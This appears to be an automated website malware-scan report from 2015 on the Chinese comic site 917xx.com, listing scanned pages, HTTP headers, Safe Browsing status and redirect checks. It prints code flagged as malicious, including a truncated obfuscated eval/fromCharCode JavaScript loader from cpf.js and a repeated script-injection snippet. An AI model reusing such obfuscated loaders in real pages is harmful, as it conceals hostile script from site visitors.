Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=917xx.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://917xx.com/ | 200 OK Content-Length: 1448 Content-Type: text/html | clean |
http://917xx.com/a/xieemanhua/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:06 GMT Accept-Ranges: bytes ETag: "74d15dccb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 7792 Content-Location: http://917xx.com/a/xieemanhua/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:11 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/xieemanhua/index.html | 200 OK Content-Length: 7792 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
| ||
http://js.users.51.la/16560669.js | 200 OK Content-Length: 1946 Content-Type: application/x-javascript | clean |
http://917xx.com/templets/default/js/jquery-1.10.2.min.js | 200 OK Content-Length: 93107 Content-Type: application/x-javascript | clean |
http://917xx.com/templets/default/js/cpf.js | 200 OK Content-Length: 52150 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+ Antivirus reports:
| ||
http://917xx.com/templets/default/js/jquery.soChange-min.js | 200 OK Content-Length: 1524 Content-Type: application/x-javascript | clean |
http://917xx.com/a/manhualianzai/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:17 GMT Accept-Ranges: bytes ETag: "ff1891dccb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 8288 Content-Location: http://917xx.com/a/manhualianzai/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:12 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/index.html | 200 OK Content-Length: 8288 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
| ||
http://917xx.com/a/manhualianzai/mayiyufengmi/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:20 GMT Accept-Ranges: bytes ETag: "61e48be2cb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 8565 Content-Location: http://917xx.com/a/manhualianzai/mayiyufengmi/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:22 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/mayiyufengmi/index.html | 200 OK Content-Length: 8565 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
| ||
http://917xx.com/plus/countall.php?view=yes&aid=13 | 200 OK Content-Length: 25 Content-Type: text/html | clean |
http://917xx.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://917xx.com/a/manhualianzai/guafusandai/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:28 GMT Accept-Ranges: bytes ETag: "8544c0e2cb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 10651 Content-Location: http://917xx.com/a/manhualianzai/guafusandai/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:22 GMT X-Died: timeout at scan.pm line 1566. X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/guafusandai/index.html | 200 OK Content-Length: 10651 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
| ||
http://917xx.com/plus/countall.php?view=yes&aid=14 | 200 OK Content-Length: 25 Content-Type: text/html | clean |
http://917xx.com/a/manhualianzai/menglongYchuan/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:38 GMT Accept-Ranges: bytes ETag: "cf11ae3cb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 11868 Content-Location: http://917xx.com/a/manhualianzai/menglongYchuan/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:23 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/menglongychuan/index.html | 200 OK Content-Length: 11868 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
| ||
http://917xx.com/plus/countall.php?view=yes&aid=15 | 200 OK Content-Length: 25 Content-Type: text/html | clean |
http://917xx.com/a/manhualianzai/renyugongzhuchuan/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:45 GMT Accept-Ranges: bytes ETag: "cbf747e3cb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 14174 Content-Location: http://917xx.com/a/manhualianzai/renyugongzhuchuan/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:23 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/renyugongzhuchuan/index.html | 200 OK Content-Length: 14174 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 917xx.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 18:36:02 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=gb2312
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: 917xx.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 18:36:02 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=gb2312
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: 917xx.com
Referer: http://www.google.com/search?q=917xx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 917xx.com
Referer: http://www.google.com/search?q=917xx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.